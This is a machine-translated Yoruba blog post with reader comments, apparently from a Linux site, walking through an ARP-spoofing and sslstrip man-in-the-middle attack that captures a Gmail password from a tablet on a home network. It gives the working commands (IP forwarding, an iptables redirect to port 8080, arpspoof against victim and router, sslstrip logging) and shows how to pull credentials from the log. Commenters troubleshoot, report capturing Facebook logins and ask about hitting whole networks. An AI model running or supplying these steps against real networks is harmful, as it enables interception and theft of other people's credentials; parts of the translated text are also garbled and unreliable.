ArpSpoofing ati SSlstrip ni Iṣe.

Pẹlẹ o Bloggers.

Fun loni Mo ni apẹẹrẹ kekere ti bi o ṣe lewu to le jẹ lati sopọ mọ eyikeyi nẹtiwọọki ti ko ni aabo ti awọn ti ọpọlọpọ wa fẹ.

Fun loni, Emi yoo lo ArpSpoofing pẹlu Sslstrip lati gba ọrọ igbaniwọle Gmail kan. Lati jẹ ki agbegbe ni iṣakoso diẹ sii, Mo ti ṣẹda akọọlẹ kan ti a pe ni "testarp@gmail.com".

Ati pe nitori Emi ko fẹran awọn asọtẹlẹ pupọ pupọ, jẹ ki a sọkalẹ si iṣowo.

Emi kii ṣe oniduro ni eyikeyi akoko fun ohun ti wọn le ṣe pẹlu alaye atẹle. Mo ṣe ni iyasọtọ fun awọn idi eto-ẹkọ

AGBAYE

Fun idanwo yii ohun ti a ni ni atẹle:

1. Attacker: O jẹ tabili tabili mi tabi kọnputa tabili ti o ni Debian Wheezy. Lati awọn ibi ipamọ ti o le fi sii sslstrip y sniff lati gba lati ni ibi-itọju

2. Njiya: Olufaragba jẹ tabulẹti Android kan ti o fẹ nikan lati wo meeli rẹ nipasẹ ẹrọ lilọ kiri ayelujara.

3. Alabọde: Aarin ni mi Cisco DPC2425 Olulana

Awọn adirẹsi.

Adirẹsi apanija: 172.26.0.2

Adirẹsi olulana: 172.26.0.1

Adirẹsi Olufaragba: 172.26.0.8

Ikọlu:

Lati ni oye diẹ diẹ sii bi ikọlu naa ṣe n ṣiṣẹ, o le lọ si ti atijọ mi post

Ohun akọkọ ti a yoo ṣe fun ikọlu yii ni lati muu ṣiṣẹ siwaju ki kọmputa wa le dari alaye naa si olufaragba laisi akiyesi wọn. (Bibẹẹkọ o yoo jẹ kiko ti kolu awọn iṣẹ)

Fun eyi a yoo lo:

echo "1" > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080

arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080

Aṣẹ kọọkan ninu window itọnisọna taara.

Nisisiyi ti a ba ṣe iru -f lati inu Linux a rii alaye naa laaye ati taara

 

aworan 1

 

Nitorinaa bawo ni a ṣe le gba ohun ti a fẹ?

Jẹ ki a kọkọ tẹ meeli wa lori tabulẹti. Lakoko ti o wọle, a rii pe ẹgbẹẹgbẹrun ati ẹgbẹẹgbẹrun awọn ohun han lori itọnisọna wa.

Bayi pe o ti pari a yoo ṣii faili wa "desdelinux" pẹlu nano

nano desdelinux

pẹlu Iṣakoso + W a wa nkan ti a pe ni PURE AABO.

Ati pe a yoo rii nkan bi eleyi.

 

aworan 2

 

Laarin laini nla yẹn ti a ko le rii ni imeeli ti olufaragba ati ọrọ igbaniwọle.

Nitorinaa a sare si apa ọtun titi ti a yoo rii nikẹhin ni opin eefin naa.

 

aworan 3

 

Ni ayeye miiran a yoo rii bi a ṣe le ṣe aabo ara wa diẹ diẹ si awọn ikọlu wọnyi.

Dahun pẹlu ji


Awọn akoonu ti nkan naa faramọ awọn ilana wa ti awọn ilana olootu. Lati jabo aṣiṣe kan tẹ nibi.

Awọn asọye 27, fi tirẹ silẹ

Fi ọrọ rẹ silẹ

Adirẹsi imeeli rẹ yoo ko le ṣe atejade.

*

*

  1. Lodidi fun data naa: Miguel Ángel Gatón
  2. Idi ti data naa: SPAM Iṣakoso, iṣakoso ọrọ asọye.
  3. Ofin: Iyọọda rẹ
  4. Ibaraẹnisọrọ data: Awọn data kii yoo ni ifọrọhan si awọn ẹgbẹ kẹta ayafi nipasẹ ọranyan ofin.
  5. Ibi ipamọ data: Alaye data ti o gbalejo nipasẹ Awọn nẹtiwọọki Occentus (EU)
  6. Awọn ẹtọ: Ni eyikeyi akoko o le ni opin, gba pada ki o paarẹ alaye rẹ.

  1.   @Jlcmux wi

    Mo lo aye yii lati sọ pe nigba ti a tẹjade ifiweranṣẹ, awọn aṣẹ ko tọ.

    Aṣẹ iptables ni ipari nsọnu 8080 ti o ku lori ila miiran. Ati lẹhinna awọn aṣẹ arpspoof gbogbo wọn wa lori ila kanna. Igbimọ kọọkan wa lori ila miiran.

    Ireti olootu rii ati pe o le ṣatunṣe.

    Ẹ kí

    1.    Afowoyi ti Orisun wi

      Mo ti ṣe awọn atunṣe ti o mẹnuba, ṣe o dara?

      Ti o ba n fi koodu sii ni titẹsi ti o fẹ, lo iwo HTML, ki o rii daju pe nkan naa tọ ṣaaju fifiranṣẹ si isunmọ. E dupe.

  2.   Luis wi

    O jẹ itutu lati mọ pe awọn ti wa ti ko ni imọ jẹ alailera. Alaye ti o dara pupọ paapaa nigbati Mo loye diẹ ninu koko-ọrọ Mo mọ pataki. E dupe!
    Dahun pẹlu ji

  3.   Giskard wi

    Ṣugbọn iyẹn n ṣiṣẹ nikan ti ẹniti o ba ku ati olufaragba ba wa lori nẹtiwọọki kanna. Ni eyikeyi idiyele, o dabi fun mi pe ti (ti o wa lori nẹtiwọọki kanna) o sopọ nipa lilo HTTPS ti ko ṣẹlẹ nitori pe data ti paroko ṣaaju ki o to fi ẹrọ rẹ silẹ. Ti o ba sopọ nipasẹ HTTP (laisi S) Mo ro pe paapaa wiwo okun nẹtiwọọki o rii awọn bọtini naa.

    1.    @Jlcmux wi

      Kii ṣe otitọ. Mo n gige ọrọ igbaniwọle gmail kan ati pe ti o ba ṣe akiyesi gmail lo https. Nitorina? Koko ọrọ ni pe botilẹjẹpe https jẹ aabo, o da lori http. Nitorina ko ṣe ailewu.

      Maṣe jẹwọ pupọ nipa https pe S kii ṣe fun Superman o jẹ fun “ailewu”

    2.    Rten wi

      o ṣiṣẹ pẹlu tabi laisi https, Mo ti gbiyanju pẹlu distro linux ti o ni imọran diẹ sii ati pe o ṣiṣẹ laisi awọn iṣoro

    3.    Afowoyi ti Orisun wi

      O le lo gbọgán lati kọ ẹkọ si awọn ti o ji Wi-Fi rẹ. 😀

      O jẹ diẹ sii tabi kere si bi ohun ti wọn sọ ni igba pipẹ sẹyin lori bulọọgi Chema Alonso:

      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
      http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html

      1.    Rayonant wi

        Ostia, nla ohun ti o ṣe! / Ati lẹhinna wọn sọ fun paranoid mi ni gbogbo igba ti Mo lo VPN nigbati wọn lọ lati ṣayẹwo akọọlẹ banki…). Ni ọna, o ni lati rii bii awọn eniyan alaibikita wa ninu awọn asọye ... ti o ba jẹ ni ipari o jiji ...

        1.    igbagbogbo3000 wi

          Bayi a nilo lati mu olukọni lori bi o ṣe le ṣẹda ati pese iṣẹ VPN tirẹ.

      2.    Daniel wi

        Itan ti o ṣopọ jẹ igbadun pupọ, paapaa o yẹ fun iwe aramada, eyi si jẹ ki n ranti nigbati mo lo intanẹẹti ti awọn aladugbo mi ati botilẹjẹpe Mo sọ pe Mo mọ koko-ọrọ, Mo ro pe Emi ko le rii awọn iwọn tootọ ti ewu ti Mo le ni nikẹhin, ni idunnu fun mi, wọn yi ọrọ igbaniwọle pada si WPA2 nikan ni ibẹ ni itan mi pẹlu ISP bẹrẹ haha

    4.    Mauricio wi

      Ti o ni idi ti akọle naa sọ Sslstrip ni iṣe.

      O n ṣiṣẹ, niwọn igba ti olutako naa wa ni aarin

  4.   anon wi

    Kini igbi ti o ṣiṣẹ ni prism? ---
    ko si.
    Kini o n duro lati firanṣẹ XD rẹ
    ikini
    ti o dara post

  5.   auroszx wi

    Ti o nifẹ si, Emi yoo ṣe idanwo ẹkọ nigbamii ... Boya Mo le paapaa yọ ọrọ igbaniwọle si WiFi ki o ni igbadun fun diẹ 😛
    Nipa aye eyikeyi, ṣe o le ṣe nkan ti o jọra lati firanṣẹ awọn oju-iwe oriṣiriṣi si awọn ti afojusun naa beere? Fun apẹẹrẹ, wọn fẹ lati ṣii Facebook ati pe Mo ṣe atunṣe wọn si Google? 😛

    1.    @Jlcmux wi

      Bẹẹni. Ṣugbọn gbogbo rẹ ni iyatọ pupọ.

      Boya Emi yoo firanṣẹ nigbamii.

  6.   kẹhinnewbie wi

    ifiweranṣẹ ti o dara pupọ, awọn akọle wọnyi jẹ eto-ẹkọ pupọ, ni bayi a nilo lati ni anfani lati dojuko ikọlu yii, nitori diẹ ninu (bii mi) sopọ si awọn nẹtiwọọki ti gbogbo eniyan (ile-ẹkọ giga fun apẹẹrẹ) yoo jẹ iranlọwọ lati yago fun.

    Saludos!

  7.   o kan-miiran-dl-olumulo wi

    Ko ṣiṣẹ fun mi 🙁

  8.   Iro ohun wi

    Ohunkan kuna mi nibi, yato si otitọ pe awọn isopọ https ti wa ni ti paroko nipasẹ ijẹrisi olupin kan (ni kete ti o ba ni ijẹrisi lori ẹrọ rẹ, aṣawakiri rẹ ni o ni abojuto ti fifi ẹnọ kọ nkan naa) pẹlu awọn iptables o ṣe atunṣe ibudo 80 (http), kii ṣe 443 eyiti o jẹ https

    1.    @Jlcmux wi

      Mo ro iyẹn paapaa. Koko ọrọ ni pe botilẹjẹpe https jẹ “aabo” o jẹ laanu da lori http. Nitorinaa sslstrip lo anfani ti iyẹn, o jẹ ki ẹrọ aṣawakiri gbagbọ pe o nlo awọn iwe-ẹri https ṣugbọn kii ṣe.

      1.    Iro ohun wi

        mimọ nik! ṣugbọn aṣawakiri yẹ ki o wo ikilọ bi “ijẹrisi yii wa lati aaye ifura kan tabi nkan bii iyẹn” ... Emi yoo dajudaju ni lati ṣe awọn idanwo XD

        1.    @Jlcmux wi

          Rara, ko si nkankan ti o jade.

  9.   o kan-miiran-dl-olumulo wi

    Ni ipari o ṣiṣẹ fun mi
    Mo ti sopọ lori nẹtiwọọki WEP pẹlu ọrọ igbaniwọle, ati pe o fihan mi ọrọ igbaniwọle taara bakanna.

    Ibeere kan. Njẹ o le ṣe ilana kanna ṣugbọn fun gbogbo awọn kọnputa ti o sopọ ni nẹtiwọọki, dipo nini olufaragba kan?

    1.    @Jlcmux wi

      Beeni o le se. Ṣugbọn emi ko ṣe awọn adanwo. Gbiyanju ara rẹ ki o sọ fun wa bi o ti n lọ.

  10.   Ẹṣẹ 19 wi

    Ohun kan ti Mo gba pẹlu eyi ni pe ẹrọ ti olufaragba lọ ni aisinipo, ṣugbọn sslstrip ko fihan mi ohunkohun: /

    1.    @Jlcmux wi

      O nilo lati mu ogiriina kuro fun akoko kan. Tabi o kere ju mu awọn isopọ ti nwọle wọle.

  11.   Mr dudu wi

    Probe ati pe Mo le ri orukọ olumulo ati ọrọ igbaniwọle ti oju-iwe facebook nikan, ni gmail Emi ko ri abajade eyikeyi ninu akọọlẹ naa, tun Mo nilo ila kan nikan ti arpspoof «arpspoof -i -t«. Ni apa keji, ẹrọ olufaragba ko le ṣii diẹ ninu awọn oju-iwe. Emi yoo tẹsiwaju iwadi, o jẹ igbadun pupọ. Iranlọwọ fun awọn ti o lo Manjaro, awọn idii lati fi sori ẹrọ ni: dsniff (eyi ni arpspoff), yiyi ati python2-pyopenssl. Sslstrip le ṣe igbasilẹ lati ibi: http://www.thoughtcrime.org/software/sslstrip/
    Lati ṣiṣẹ o $ python2 sslstrip.py
    Ẹ kí

  12.   Mr dudu wi

    O ko jade ṣugbọn laini arpspoof ni: #arpspoof -i int -t ip-victim ip-router

  13.   gilbert wi

    wo Mo ṣe gangan ohun ti o sọ:

    iwoyi "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 8080

    arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
    arpspoof -i eth0 -t 172.26.0.1 172.26.0.2

    Iṣoro naa ni pe olufaragba naa, ti o jẹ pc miiran ti Mo ni nibi ninu yara mi, ni a fi silẹ laisi asopọ si aaye ti Mo ni lati tun olulana naa bẹrẹ, kini MO le ṣe, ṣe iranlọwọ fun mi.

    Ohun miiran ti Mo n ṣiṣẹ pẹlu ẹrọ foju kan, ati pe nigbati mo ba ṣe pipaṣẹ iwconfig, wlan0 ko han, tabi nigbati Mo ṣe ifconfig, sibẹsibẹ ti Mo ba ni intanẹẹti lori ẹrọ foju mi ​​kini pẹlu wiwo eth0.

bool (otitọ)